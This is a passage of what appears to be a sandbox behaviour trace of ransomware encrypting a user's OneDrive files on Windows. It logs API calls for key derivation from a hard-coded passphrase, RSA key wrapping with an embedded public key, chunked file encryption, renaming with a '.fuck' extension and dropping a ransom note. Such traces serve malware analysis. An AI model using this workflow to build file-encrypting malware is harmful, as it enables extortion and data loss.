CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.912] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.913] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.913] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.913] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.913] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.914] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.914] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.914] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.914] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.914] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.914] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.914] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.914] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.914] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.914] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.914] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.914] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x50, lpOverlapped=0x0) returned 1 [0273.915] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x50, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x60) returned 1 [0273.915] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x60, lpOverlapped=0x0) returned 1 [0273.915] CloseHandle (hObject=0x5d48) returned 1 [0273.915] CloseHandle (hObject=0x5d3c) returned 1 [0273.915] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.922] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.922] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.926] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.927] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.927] CryptDestroyKey (hKey=0x2fae08) returned 1 [0273.927] CryptReleaseContext (hProv=0x2f29288, dwFlags=0x0) returned 1 [0273.927] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.927] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0273.928] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\readme_back_files.htm")) returned 0xffffffff [0273.928] AreFileApisANSI () returned 1 [0273.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0273.928] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.929] GetFileType (hFile=0x5d4c) returned 0x1 [0273.929] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.931] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.931] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0273.932] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.932] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.932] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.932] GetLastError () returned 0x0 [0273.932] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.932] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.933] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.934] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\da\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0273.934] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\da\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.935] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f28c28) returned 1 [0273.937] CryptCreateHash (in: hProv=0x2f28c28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.937] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0273.937] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.937] CryptDeriveKey (in: hProv=0x2f28c28, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fae08) returned 1 [0273.937] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.937] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.937] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f29288) returned 1 [0273.938] CryptImportPublicKeyInfo (in: hCryptProv=0x2f29288, dwCertEncodingType=0x1, pInfo=0x2f34240*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34270*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34278*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2faf08) returned 1 [0273.938] CryptEncrypt (in: hKey=0x2faf08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.938] CryptEncrypt (in: hKey=0x2faf08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29068*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f29068*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.938] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f29068*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f29068*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.940] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.942] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.942] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.944] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.944] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.944] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.944] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.944] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.944] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.944] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.944] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.944] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.945] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.950] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.950] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.950] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.950] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.950] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.950] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.950] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.950] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.950] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.951] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.951] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.951] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.951] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.951] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.951] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.951] CryptEncrypt (in: 